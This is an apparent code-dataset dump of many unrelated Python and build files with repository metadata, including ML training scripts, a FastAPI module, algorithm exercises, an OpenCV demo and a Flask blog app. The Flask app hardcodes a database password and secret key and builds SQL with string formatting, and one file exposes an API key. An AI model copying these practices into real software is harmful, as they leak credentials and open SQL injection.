"""Maybe sorts beams within a `TensorArray`.
Args:
t: A `TensorArray` of size `max_time` that contains `Tensor`s of shape
`[batch_size, beam_width, s]` or `[batch_size * beam_width, s]` where
`s` is the depth shape.
parent_ids: The parent ids of shape `[max_time, batch_size, beam_width]`.
sequence_length: The sequence length of shape `[batch_size, beam_width]`.
Returns:
A `TensorArray` where beams are sorted in each `Tensor` or `t` itself if
it is not a `TensorArray` or does not meet shape requirements.
"""
if not isinstance(t, tf.TensorArray):
return t
# pylint: disable=protected-access
if (not t._infer_shape or not t._element_shape
or t._element_shape[0].ndims is None
or t._element_shape[0].ndims < 1):
shape = (
t._element_shape[0] if t._infer_shape and t._element_shape
else tf.TensorShape(None))
tf.logger.warn("The TensorArray %s in the cell state is not amenable to "
"sorting based on the beam search result. For a "
"TensorArray to be sorted, its elements shape must be "
"defined and have at least a rank of 1, but saw shape: %s"
% (t.handle.name, shape))
return t
# shape = t._element_shape[0]
# pylint: enable=protected-access
# if not _check_static_batch_beam_maybe(
# shape, tensor_util.constant_value(self._batch_size), self._beam_width):
# return t
t = t.stack()
with tf.control_dependencies(
[_check_batch_beam(t, self._batch_size, self._beam_width)]):
return gather_tree_from_array(t, parent_ids, sequence_length)
| [
"tanjiahuei@gmail.com"
] | tanjiahuei@gmail.com |
8e20f5f2b9d24a61c69796e934e556c5c6aec474 | a91484418beb39bd1d8ea4f59dedb1ad0a10cfcf | /train_deep.py | abc2d5ca1c42949039b453fa63cf0427c579ccb8 | [] | no_license | kaichoulyc/course_segmentation | 2991b3bcb38bf46036c61612c653c55e067bbe0b | 4d5b14d9e91cea446c289a08e3f7f01cc4e51c6e | refs/heads/master | 2020-05-31T08:18:32.050944 | 2020-01-09T11:54:35 | 2020-01-09T11:54:35 | 190,186,499 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 4,506 | py | import torch
import numpy as np
import os
from tqdm import tqdm
import pandas as pd
from utils.iou import compute_mask_iou
from utils.generator import claim_generator
from utils.losses import *
from model.deep_lab.deeplab import *
import timeit
import datetime
abs_path = '/home/kaichou/ssd/course'
train_path = os.path.join(abs_path, 'train')
valid_path = os.path.join(abs_path, 'valid')
test_path = os.path.join(abs_path, 'test')
epochs_df = pd.DataFrame(columns = ['Epoch', 'Train_loss', 'Val_loss', 'Val_IoU', 'Time'])
model_type = 'deeplab'
model_conf = [DeepLab, 18, 'DeepLab']
num_workers = 10
uniq = datetime.datetime.now()
uniq_add = f'_{uniq.day}-{uniq.month}-{uniq.year}-{uniq.hour}-{uniq.minute}-{uniq.second}_'
way_to_info = 'information/' + model_type + '/' + model_conf[2] + uniq_add + 'inf.csv'
print('Enter learning rate:')
lr = float(input())
print('Enter amount of epochs:')
epochs = int(input())
path_for_weights = os.path.join('weights/', model_type)
path_for_model = os.path.join(path_for_weights, 'model')
path_for_optim = os.path.join(path_for_weights, 'optim')
train_loader = claim_generator(train_path, 4, num_workers, 513, mode = 'train')
val_loader = claim_generator(valid_path, 4, num_workers, 513, mode = 'test')
model = model_conf[0]()
criterions = {
'lovasz': Loss(1, 2),
'iou': compute_mask_iou
}
train_params = [{'params': model.get_1x_lr_params(), 'lr': lr},
{'params': model.get_10x_lr_params(), 'lr': lr * 10}]
optimizer = torch.optim.SGD(train_params, lr = lr, momentum=0.9, weight_decay=0.0005)
last_epoch = 0
print('Load weghts?')
weights = input()
if weights == 'Yes':
print('Needed epoch:')
last_epoch = int(input())
model.load_state_dict(torch.load(os.path.join(path_for_model, model_conf[2] + f'_model{last_epoch}' + '.pth')))
optimizer.load_state_dict(torch.load(os.path.join(path_for_optim, model_conf[2] + f'_optim{last_epoch}' + '.pth')))
for state in optimizer.state.values():
for k, v in state.items():
if isinstance(v, torch.Tensor):
state[k] = v.cuda()
device = torch.device('cuda')
model = model.to(device)
def validating(model, criterions, val_loader, device):
model.eval()
with torch.no_grad():
epoch_loss_b = 0
schet = 0
iou_full = 0
for x, y in val_loader:
schet += 1
x = x.to(device)
y = y.to(device)
mask_pred = model(x)
loss_b = criterions['lovasz'](mask_pred, y)
epoch_loss_b += loss_b.item()
iou_full += criterions['iou'](y.cpu().squeeze(1).numpy(), (torch.sigmoid(mask_pred) > 0.5).cpu().squeeze(1).numpy().astype(np.float))
return epoch_loss_b / schet, iou_full / schet
def traininng(model, st_epoch, epochs, criterions, optimizer, train_loader, path_for_model, path_for_optim, device, inf_df, model_conf, inf_way):
scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer = optimizer, mode = 'min', verbose = True)
for epoch in tqdm(range(st_epoch, epochs)):
st = timeit.default_timer()
model.train()
print('Starting epoch {}/{}.'.format(epoch + 1, epochs))
epoch_loss = 0
schet = 0
for x, y in train_loader:
schet += 1
x = x.to(device)
with torch.no_grad():
y = y.to(device)
mask_pred = model(x)
loss = criterions['lovasz'](mask_pred, y)
epoch_loss += loss.item()
optimizer.zero_grad()
loss.backward()
optimizer.step()
val_loss, val_iou = validating(model, criterions, val_loader, device)
scheduler.step(val_loss)
print(f'Epoch finished ! Train Loss: {epoch_loss / schet} Valid loss: {val_loss} Val IoUc: {val_iou}')
if (epoch != 0) and (((epoch + 1) % 3) == 0):
torch.save(model.state_dict(), os.path.join(path_for_model, model_conf[2] + f'_model{epoch + 1}.pth'))
torch.save(optimizer.state_dict(), os.path.join(path_for_optim, model_conf[2] + f'_optim{epoch + 1}.pth'))
fin = timeit.default_timer() - st
print(f'Time spent on epoch {fin}')
inf_df.loc[epoch] = [epoch + 1, epoch_loss / schet, val_loss, val_iou, fin]
inf_df.to_csv(inf_way)
traininng(model, last_epoch, epochs, criterions, optimizer, train_loader, path_for_model, path_for_optim, device, epochs_df, model_conf, way_to_info) | [
"rustem98@list.ru"
] | rustem98@list.ru |
57010b47b950365998b095abc368fa6298c74e4d | 0379bae8cff218a039d79104c38cd1ad2b506919 | /vision/depends.py | bbdf258031515e9ac62cdeb28005634656976f99 | [] | no_license | ottozrq/Louvre | 0128673e05cdabbd1acc5499605a31232b110682 | 170d3421c821694c31b6fee49c99e97fe76f728e | refs/heads/master | 2022-07-14T04:21:42.390515 | 2022-07-03T19:50:38 | 2022-07-03T19:50:38 | 167,688,883 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,220 | py | import logging
from typing import Optional
from fastapi import Depends, Request, HTTPException, status
from fastapi.security import OAuth2PasswordBearer
from pydantic import PositiveInt
from pydantic.types import constr
import models as m
import sql_models as sm
from utils import flags
from utils.utils import VisionDb, postgres_session, VisionSearch, search_session
class _Bearer(OAuth2PasswordBearer):
async def __call__(self, request: Request) -> Optional[str]:
return not flags.VisionFlags.get().superuser_email and await super(
_Bearer, self
).__call__(request)
security = _Bearer("/token/")
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
def get_psql() -> VisionDb:
with postgres_session() as psql:
yield psql
def get_search() -> VisionSearch:
with search_session() as search:
yield search
def get_pagination(
request: Request,
page_token: constr(regex=r"\d+") = None, # noqa
page_size: PositiveInt = None,
):
return m.Pagination(request=request, page_size=page_size, page_token=page_token)
def get_user_id(
request: Request,
_=Depends(security),
) -> str:
return str(request.user.user_uuid)
def get_user_email(
request: Request,
_=Depends(security),
) -> str:
return str(request.user.user_email)
def get_logged_in_user(
user_id=Depends(get_user_id),
db=Depends(get_psql),
) -> sm.User:
return m.User.db(db).get_or_404(user_id)
def superuser_email() -> str:
return flags.VisionFlags.get().superuser_email
def user_owned_series(
series_id: int,
user: sm.User = Depends(get_logged_in_user),
db: VisionDb = Depends(get_psql),
) -> sm.Series:
if user.own_series(series_id):
return m.Series.db(db).get_or_404(series_id)
raise HTTPException(status.HTTP_403_FORBIDDEN, "Cannot access series")
def user_owned_introductions(
introduction_id: int,
user: sm.User = Depends(get_logged_in_user),
db: VisionDb = Depends(get_psql),
) -> sm.Series:
if user.own_series(introduction_id):
return m.Introduction.db(db).get_or_404(introduction_id)
raise HTTPException(status.HTTP_403_FORBIDDEN, "Cannot access series")
| [
"zhang_r@epita.fr"
] | zhang_r@epita.fr |
1e24c62ea195655b0d2b9e5b17a2627f86a53fe8 | 359430379764e4f1936dd24a5328bbbbc0f0e928 | /Code/AlgoPython/3_sum_triplet.py | bdf5a7d5bb4044147ad0529ce0d716621d51d648 | [] | no_license | chenwang07/LeetCode101 | a002878bf0e584cb6a69f6519d3c6e5adace73c1 | 691a36a0d43de9345fe6fa34b01495ae9ce2d0d1 | refs/heads/master | 2023-08-24T09:12:22.558429 | 2021-09-27T05:09:51 | 2021-09-27T05:09:51 | 359,049,371 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,248 | py |
def threeSum(nums):
nums.sort()
ans = []
i = 0
while i < len(nums) - 2:
j = i + 1
k = len(nums) - 1
while j < k:
target = nums[i] + nums[j] + nums[k]
if target == 0:
ans.append([i, j, k])
temp_k = k
temp_j = j
while nums[temp_k] == nums[temp_k - 1] and j < temp_k - 1:
ans.append([i, j, temp_k - 1])
temp_k -= 1
while nums[temp_j] == nums[temp_j + 1] and temp_j + 1 < k:
ans.append([i, temp_j + 1, k])
temp_j += 1
while nums[j] == nums[j + 1] and nums[k] == nums[k - 1] and j + 1 < k - 1:
ans.append([i, j + 1, k - 1])
j += 1
k -= 1
j += 1
k -= 1
elif target > 0:
k -= 1
else:
j += 1
i += 1
return ans
test_case = [[-5, 2, 2, 3, 3], [-4, 2, 2, 2, 2]]
for nums in test_case:
print("test case: " + str(nums))
ans = threeSum(nums)
print(" ans: " + str(ans))
| [
"wangchen9617@gmail.com"
] | wangchen9617@gmail.com |
2858f8e42d24497ae53e3eb44307634afd3ca1a9 | 28e1eec958ba44af8f6c24fa30c5876ddbfef3c3 | /Network Project/data_collection_MPI.py | 5a676ff7d890c2df604829333809ab1d9c38c660 | [] | no_license | keertanavc/Hollywood-Network-Analysis | bc2b346539a0231d744611e7724e968e704d9f01 | 68329c09d684aeb63cbfd4c72a63d1ef19101a79 | refs/heads/master | 2023-05-01T14:49:05.517345 | 2021-05-18T18:00:58 | 2021-05-18T18:00:58 | 276,760,929 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 810 | py | import pandas as pd
import time
from mpi4py import MPI
import omdb
API_KEYS = list(pd.read_csv('keys.csv', header=False))
file = "ids.csv"
ids = list(pd.read_csv(file)['IDS'])
data_list = [None] * len(ids)
def get_data():
# Get rank of process and overall size of communicator:
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
API_KEY = API_KEYS[rank]
omdb.set_default('apikey', API_KEY)
interval = int(len(ids)/size)
start = rank * interval
end = (rank + 1) * interval
for i in range(start, end):
print(i)
data_list[i] = omdb.imdbid(ids[i], fullplot=True, tomatoes=True)
def main():
get_data()
if __name__ == '__main__':
t0 = time.time()
main()
print('time is ', time.time()-t0)
| [
"noreply@github.com"
] | noreply@github.com |
e5bdaa5d9ff14cb0d2b34e49fa0389a934836dfa | 8325f238b8d59f9302a945340070809aab3b1901 | /manage.py | 892dfb1b15350aa9575265d56eb0aed1c1d04e87 | [] | no_license | k1-k0/wishl | c2c512499f2f18aa08b5427e4d2ba6435343a8b5 | f04e134b37a26b58d1a5acfdf41bab5d94eb8ae7 | refs/heads/main | 2022-12-26T04:58:00.238984 | 2020-10-10T11:35:46 | 2020-10-10T11:35:46 | 302,756,186 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 661 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'wishl.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"kmssrvk@gmail.com"
] | kmssrvk@gmail.com |
feb850b55fd1cc2c30c7f719c3b998baa728d807 | 7466c07a65c9a6356bcb05fafb03d4eed7ba7ffa | /pyradox/csv.py | 9610f2789f466c9db3efbfe57c393f755065b9f1 | [
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] | permissive | CHBresser/pyradox | 658cdfa0f70b48ccce50e21f76d62a468d5c6100 | c44f6c0b8ce6705722237693ecc02a31c3081cb1 | refs/heads/master | 2021-05-11T07:48:17.540632 | 2017-12-20T08:17:54 | 2017-12-20T08:17:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,915 | py | import csv
import os
import warnings
import pyradox.primitive
import pyradox.struct
import pyradox.table
from pyradox.error import ParseError, ParseWarning
encoding = 'cp1252'
class ParadoxDialect(csv.Dialect):
delimiter = ';'
lineterminator = '\n'
quoting = csv.QUOTE_NONE # no quotes AFAICT
strict = True
def parse_file(filename, verbose=False):
f = open(filename, encoding=encoding)
lines = f.readlines()
f.close()
if verbose: print('Parsing file %s.' % filename)
return parse(lines, filename)
def parse_dir(dirname, verbose=False):
"""Given a directory, iterate over the content of the .csv files in that directory"""
for filename in os.listdir(dirname):
fullpath = os.path.join(dirname, filename)
if os.path.isfile(fullpath):
_, ext = os.path.splitext(fullpath)
if ext == ".csv":
yield filename, parse_file(fullpath, verbose)
def parse(lines, filename):
reader = csv.reader(lines, dialect = ParadoxDialect)
heading_tokens = next(reader, None)
if heading_tokens is None:
raise ParseError('%s, row 1 (headings): csv file must have at least one row' % filename)
headings = [x.lower() for x in heading_tokens[:-1]]
result = pyradox.table.Table(headings)
for i, row_tokens in enumerate(reader):
row_tokens = row_tokens[:-1]
if len(row_tokens) == 0: continue
if len(row_tokens) != len(headings):
warnings.warn(ParseWarning('%s, row %d: row length (%d) should be same as headings length (%d)' % (filename, i + 2, len(row_tokens), len(headings))))
for i in range(len(row_tokens), len(headings)):
row_tokens.append('')
row_tokens = row_tokens[:len(headings)]
result.add_row([pyradox.primitive.make_primitive(token, default_token_type = 'str') for token in row_tokens])
return result
| [
"ajul1987@gmail.com"
] | ajul1987@gmail.com |
1d96da553a7c5a29b6415d5ee4db4fb85660f547 | 6c4bcd1ad86869ee15aab228853060b26ed09e3b | /suite/app.mozbuild | 6f34b52a6ea3bd0ed4f329f6ed81b645ffd6b50e | [] | no_license | mxOBS/deb-pkg_icedove | 18b43958d7bfc3529dc7de505ab6d31a08446be1 | 10b6a968583b8d721bedcffc87851c569e2467a3 | refs/heads/master | 2021-01-20T08:24:26.807514 | 2015-05-14T13:56:12 | 2015-05-14T13:56:12 | 35,611,831 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,014 | mozbuild | # vim: set filetype=python:
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
app_libxul_dirs = []
app_libxul_static_dirs = []
include('../bridge/bridge.mozbuild')
if not CONFIG['MOZ_INCOMPLETE_EXTERNAL_LINKAGE']:
app_libxul_dirs = mailnews_dirs
app_libxul_static_dirs = mailnews_static_dirs
if not CONFIG['LIBXUL_SDK']:
include('/toolkit/toolkit.mozbuild')
if CONFIG['MOZ_INCOMPLETE_EXTERNAL_LINKAGE']:
add_tier_dir('app', mailnews_static_dirs, static=True)
add_tier_dir('app', mailnews_dirs)
if CONFIG['MOZ_EXTENSIONS']:
add_tier_dir('app', 'extensions')
if CONFIG['MOZ_COMPOSER']:
add_tier_dir('app', '../editor/ui')
add_tier_dir('app', CONFIG['MOZ_BRANDING_DIRECTORY'])
if CONFIG['MOZ_CALENDAR']:
add_tier_dir('app', '../calendar/lightning')
add_tier_dir('app', ['../mozilla/xpfe/components/autocomplete', '../suite'])
| [
"privacy@not.given"
] | privacy@not.given |
c87601687dd5c7c65e20dba92b239e070261b317 | 3670f46666214ef5e1ce6765e47b24758f3614a9 | /oneflow/python/test/onnx/util.py | d2222f7d6b30cad257fa79d950b134ab33ead31c | [
"Apache-2.0"
] | permissive | ashing-zhang/oneflow | 0b8bb478ccd6cabea2dca0864defddab231919bf | 70db228a4d361c916f8f8d85e908795b479e5d20 | refs/heads/master | 2022-12-14T21:13:46.752535 | 2020-09-07T03:08:52 | 2020-09-07T03:08:52 | 293,535,931 | 1 | 0 | Apache-2.0 | 2020-09-07T13:28:25 | 2020-09-07T13:28:24 | null | UTF-8 | Python | false | false | 2,994 | py | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import numpy as np
import oneflow as flow
import onnxruntime as ort
import onnx
from collections import OrderedDict
import tempfile
import os
import shutil
def convert_to_onnx_and_check(
job_func,
print_outlier=False,
explicit_init=True,
external_data=False,
ort_optimize=True,
opset=None,
):
check_point = flow.train.CheckPoint()
if explicit_init:
# it is a trick to keep check_point.save() from hanging when there is no variable
@flow.global_function(flow.FunctionConfig())
def add_var():
return flow.get_variable(
name="trick",
shape=(1,),
dtype=flow.float,
initializer=flow.random_uniform_initializer(),
)
check_point.init()
flow_weight_dir = tempfile.TemporaryDirectory()
check_point.save(flow_weight_dir.name)
# TODO(daquexian): a more elegant way?
while not os.path.exists(os.path.join(flow_weight_dir.name, "snapshot_done")):
pass
onnx_model_dir = tempfile.TemporaryDirectory()
onnx_model_path = os.path.join(onnx_model_dir.name, "model.onnx")
flow.onnx.export(
job_func,
flow_weight_dir.name,
onnx_model_path,
opset=opset,
external_data=external_data,
)
flow_weight_dir.cleanup()
ort_sess_opt = ort.SessionOptions()
ort_sess_opt.graph_optimization_level = (
ort.GraphOptimizationLevel.ORT_ENABLE_EXTENDED
if ort_optimize
else ort.GraphOptimizationLevel.ORT_DISABLE_ALL
)
sess = ort.InferenceSession(onnx_model_path, sess_options=ort_sess_opt)
onnx_model_dir.cleanup()
assert len(sess.get_outputs()) == 1
assert len(sess.get_inputs()) <= 1
ipt_dict = OrderedDict()
for ipt in sess.get_inputs():
ipt_data = np.random.uniform(low=-10, high=10, size=ipt.shape).astype(
np.float32
)
ipt_dict[ipt.name] = ipt_data
onnx_res = sess.run([], ipt_dict)[0]
oneflow_res = job_func(*ipt_dict.values()).get().numpy()
rtol, atol = 1e-2, 1e-5
if print_outlier:
a = onnx_res.flatten()
b = oneflow_res.flatten()
for i in range(len(a)):
if np.abs(a[i] - b[i]) > atol + rtol * np.abs(b[i]):
print("a[{}]={}, b[{}]={}".format(i, a[i], i, b[i]))
assert np.allclose(onnx_res, oneflow_res, rtol=rtol, atol=atol)
| [
"noreply@github.com"
] | noreply@github.com |
73b8962f54f6fcb301915d94c2bc3359b13a4d6b | 00149437f4bfb490a56cc7faf170a27c2ba16fcf | /.ipynb_checkpoints/api_keys-checkpoint.py | 4afbf07688d989b10cb2225846ce24fb348d8867 | [] | no_license | PabloBarbatto/WeatherPython | d0c20d2161949ab1775f0d6f56710dfa68643f55 | 9a9651cb42774fb6574e1e8223b307e7f6ec3b6f | refs/heads/master | 2020-04-02T07:21:29.138648 | 2018-10-27T18:05:30 | 2018-10-27T18:05:30 | 154,192,362 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 45 | py | api_key = "19b32067ed32e919fafe0c91f8bf0faa"
| [
"pablonbarbatto@gmail.com"
] | pablonbarbatto@gmail.com |
95c8d89866be1ab21e245c5c39170e3918f41ece | 78c4ccb183a99ebaabcdc3a3a69f029e4aee0f5c | /AlgorithmStudy/백준/무지성 랜덤풀이/9월/9.27/13549 숨바꼭질3.py | e0e130cd47181bea752f97e6b07942782346f798 | [] | no_license | cladren123/study | ef2c45bc489fa658dbc9360fb0b0de53250500e5 | 241326e618f1f3bb1568d588bf6f53b78920587a | refs/heads/master | 2023-09-02T02:21:24.560967 | 2021-11-05T12:20:06 | 2021-11-05T12:20:06 | 368,753,950 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,339 | py | """
문제유형 :
그래프 이론
그래프 탐색
너비 우선 탐색
다익스트라
0-1 너비 우선 탐색
시간초과 발생
범위를 지정해서 범위가 초과하는 것들을 걷어내니 해결할 수 있었다.
"""
import sys
from collections import deque
input = sys.stdin.readline
# n : 수빈 k : 동생
n, m = map(int, input().split())
# 최대 크기 변수
maxnum = 100001
# x 지점에 도착했을 때 시간을 담을 리스트
timelist = [-1] * maxnum
# x 지점을 방문했는지 표시하는 리스트
visited = [0] * maxnum
# 초기화 하는 과정도 중요하다. -> 하지 않으면 에러 발생
que = deque()
que.append(n)
timelist[n] = 0
visited[n] = 1
while que :
loc = que.popleft()
# *2 인 경우, 시간을 소요하지 않으므로 먼저 탐색하게 만든다.
if loc*2 < maxnum and visited[loc*2] == 0 :
timelist[loc*2] = timelist[loc]
visited[loc*2] = 1
que.appendleft(loc*2)
# +1 인 경우
if loc+1 < maxnum and visited[loc+1] == 0 :
visited[loc+1] = 1
timelist[loc+1] = timelist[loc] + 1
que.append(loc+1)
# -1 인 경우
if loc-1 >= 0 and visited[loc-1] == 0 :
visited[loc-1] = 1
timelist[loc-1] = timelist[loc] + 1
que.append(loc-1)
print(timelist[m])
| [
"48821942+cladren123@users.noreply.github.com"
] | 48821942+cladren123@users.noreply.github.com |
cfdd9936a4881e9c2aed6cc7dcbb8330ddc68541 | 84c2986c9c9dfa916e5e6021695302c38210718d | /Image Processing in OpenCV/Smoothing Images.py | dfc8e288d5cc6ff25a4f03ba40eec1f285b916ec | [] | no_license | PurpleRabb/Python-OpenCV-Samples | 8fede8630b7777d924ef49c00260eb055165d602 | 942def64caa883a0b3596b1c90efef49cb824bde | refs/heads/master | 2021-07-16T11:45:41.127411 | 2020-11-24T10:17:06 | 2020-11-24T10:17:06 | 226,841,272 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 682 | py | import cv2
import numpy as np
from matplotlib import pyplot as plt
# 2D Convolution, 用指定kernel做卷积操作
img = cv2.imread('../images/opencv-logo2.png')
kernel = np.ones((5, 5), np.float32) / 25
print(kernel)
dst2d = cv2.filter2D(img, -1, kernel)
blur = cv2.blur(img, (5, 5))
gauss_blur = cv2.GaussianBlur(img, (5, 5), 0)
median = cv2.medianBlur(img, 5)
bil_blur = cv2.bilateralFilter(img, 9, 75, 75) # 双边滤波
images = [img, dst2d, blur, gauss_blur, median, bil_blur]
titles = ['Original', 'Averaging', 'blur', 'gauss_blur', 'median_blur', 'bil_blur']
for i in range(5):
plt.subplot(2, 3, i + 1)
plt.imshow(images[i])
plt.title(titles[i])
plt.show()
| [
"364725259@qq.com"
] | 364725259@qq.com |
2d9bb0acebd09799be1988fc4a1ab4dba359e456 | a84f3c73126f6f7a81a6944cc1559421160fa7cf | /solved/Silver1/[11052]카드 구매하기.py | 2c740da5df6aae231ffaac614ccb33f5f953b833 | [] | no_license | JiMinwoo/Algorithm | c042ca1a0344de701ef0526a8ac7549edc821009 | 5346cd080b6221688e944165bec84872333628e6 | refs/heads/main | 2023-07-10T07:31:40.730026 | 2021-08-13T14:44:34 | 2021-08-13T14:44:34 | 372,530,790 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 280 | py | N = int(input())
pack = [0]
pack += list(map(int,input().split()))
dp = [0] * (N+1)
dp[1] = pack[1]
dp[2] = max(pack[2], pack[1]*2)
for i in range(3, N+1):
for j in range(1, i//2 + 1): #j와 i-j로 만드는 경우
dp[i] = max(pack[i], dp[j] + dp[i-j])
print(dp[N]) | [
"jmw492@naver.com"
] | jmw492@naver.com |
2a6a40cc88e837f0735dc0d70e5787830ec168fd | c337ba37b6442e0baef21f942fae7dcdf3ab1515 | /app.py | 09ded8ae294f7e15dce6d32ba90eed36b3cc26a6 | [] | no_license | mwuillai/blog | 39c2c4456d97b93089970203c048021ebc74f7a6 | e37b1638b8e584b44fb34243418a19bee8dcc2c1 | refs/heads/master | 2020-03-19T16:35:04.640834 | 2018-08-16T08:02:12 | 2018-08-16T08:02:12 | 136,720,911 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,660 | py | from flask import Flask, render_template, flash, request, redirect, url_for, session, logging
from flask_mysqldb import MySQL
from wtforms import Form, StringField, TextAreaField, PasswordField, validators
from passlib.hash import sha256_crypt
from functools import wraps
app = Flask(__name__)
# config Mysql
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = 'aqwZSX'
app.config['MYSQL_DB'] = 'flaskblog'
app.config['MYSQL_CURSORCLASS'] = 'DictCursor'
# init MYSQL
mysql = MySQL(app)
def page_data(title):
cur = mysql.connection.cursor()
cur.execute("SELECT * FROM pages WHERE title = '{0}'".format(title))
page = cur.fetchone()
return page
@app.route('/')
def index():
page = page_data("Hello world")
return render_template('home.html', page=page)
@app.route('/about')
def about():
page = page_data("à propos")
return render_template('about.html', page=page)
@app.route('/articles')
def articles():
cur = mysql.connection.cursor()
cur.execute("SELECT * FROM articles")
articles = cur.fetchall()
page = page_data("Articles")
return render_template('articles.html', articles=articles, page=page)
cur.close()
@app.route('/article/<string:id>/')
def article(id):
cur = mysql.connection.cursor()
cur.execute("SELECT * FROM articles WHERE id = %s", (id))
article = cur.fetchone()
return render_template('article.html', article=article)
cur.close()
class registerform(Form):
name = StringField('name', [validators.length(min=1, max=50)])
username = StringField('username', [validators.length(min=4, max=25)])
email = StringField('email', [validators.length(min=6, max=50)])
password = PasswordField('password', [validators.DataRequired(
), validators.EqualTo('confirm', message='passwords do not match')])
confirm = PasswordField('confirm password')
class ArticleForm(Form):
title = StringField('title', [validators.length(min=1, max=255)])
body = TextAreaField('body')
@app.route('/register', methods=['GET', 'POST'])
def register():
form = registerform(request.form)
if request.method == 'POST' and form.validate():
name = form.name.data
email = form.email.data
username = form.username.data
password = sha256_crypt.encrypt(str(form.password.data))
# create cursor
cur = mysql.connection.cursor()
cur.execute("INSERT INTO users(name, email, username, password) VALUES(%s, %s, %s, %s)", (
name, email, username, password))
# Commit to DB
mysql.connection.commit()
cur.close()
flash('you are now registered and can log in', 'success')
page = page_data("Connexion")
return redirect(url_for('login'), page=page)
page = page_data("Inscription")
return render_template('register.html', form=form, page=page)
# Check if user logged in
def is_logged_in(f):
@wraps(f)
def wrap(*args, **kwargs):
if 'logged_in' in session:
return f(*args, **kwargs)
else:
flash('Unauthorized, Please login', 'danger')
page = page_data("Connexion")
return redirect(url_for('login'), page=page)
return wrap
@app.route('/add_article', methods=['GET', 'POST'])
@is_logged_in
def add_article():
form = ArticleForm(request.form)
if request.method == 'POST' and form.validate():
title = form.title.data
body = form.body.data
# create cursor
cur = mysql.connection.cursor()
cur.execute("INSERT INTO articles(title, body) VALUES(%s, %s)", (
title, body))
# Commit to DB
mysql.connection.commit()
cur.close()
flash('Article add successfully', 'success')
page = page_data("Tableau de bord")
return redirect(url_for('dashboard'), page=page)
page = page_data("ajout d'article")
return render_template('add_article.html', form=form, page=page)
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
# Get form fields
username = request.form['username']
password_candidate = request.form['password']
# Create cursor
cur = mysql.connection.cursor()
# Get user by username
result = cur.execute(
"SELECT * FROM users WHERE username = %s", [username])
if result > 0:
data = cur.fetchone()
password = data['password']
# Compare Passwords
if sha256_crypt.verify(password_candidate, password):
# Passed
session['logged_in'] = True
session['username'] = username
flash('You are now logged in', 'success')
app.logger.info('PASSWORD MATCHED')
return redirect(url_for('dashboard'))
else:
error = 'Invalid login'
app.logger.info('PASSWORD NOT MATCHED')
return render_template('login.html', error=error)
cur.close()
else:
error = 'Username not found'
return render_template('login.html', error=error)
return render_template('login.html')
@app.route('/dashboard')
@is_logged_in
def dashboard():
page = page_data("Tableau de bord")
return render_template('dashboard.html', page=page)
# Logout
@app.route('/logout')
def logout():
session.clear()
flash('You are now logged out')
return render_template('login.html')
if __name__ == '__main__':
app.secret_key = "secret123"
app.run(debug=True)
| [
"wuillaimathieu78@gmail.com"
] | wuillaimathieu78@gmail.com |
912e9905ac623ea7e54e73e59c0737fe8a99f927 | f26c31f7bddf6afbe4c621f5fdb73f95802411ab | /git_connect_server/git_connect_server/asgi.py | 96da2f7c9e1706832d61af71a20aa472b28fc292 | [] | no_license | Harsh-pandya/gitConnetDjangoVerison | 23e7343a644e6fb4c1aa35299aa98be6e3ca8d07 | ab89844174c70ccae0db9e2ed83681b82b0c4731 | refs/heads/main | 2023-03-10T02:40:27.464265 | 2021-03-02T15:06:41 | 2021-03-02T15:06:41 | 342,909,330 | 0 | 1 | null | 2021-03-01T16:40:12 | 2021-02-27T16:57:21 | HTML | UTF-8 | Python | false | false | 413 | py | """
ASGI config for git_connect_server project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'git_connect_server.settings')
application = get_asgi_application()
| [
"harshpandya735@gmial.com"
] | harshpandya735@gmial.com |
e22400dd5ebe027e942bdb5aa62837fbadb37131 | d80c8ab73282091e863cd0beef723edd4c91c98d | /models.py | d1a7a128f498863cfac4635c336bc4235d13f8c3 | [] | no_license | DiegoIturra/Web-Scraper | a1f5e04bf71cd4490f51146181d3dfa0159f5f5e | ff6b6cbd4c7585fdc147c9ab9c3f3a61099468c3 | refs/heads/master | 2023-07-02T04:17:43.416018 | 2021-08-15T23:28:09 | 2021-08-15T23:28:09 | 391,232,378 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 718 | py | from extensions import db,marshmallow
class Book(db.Model):
id = db.Column(db.Integer, primary_key=True)
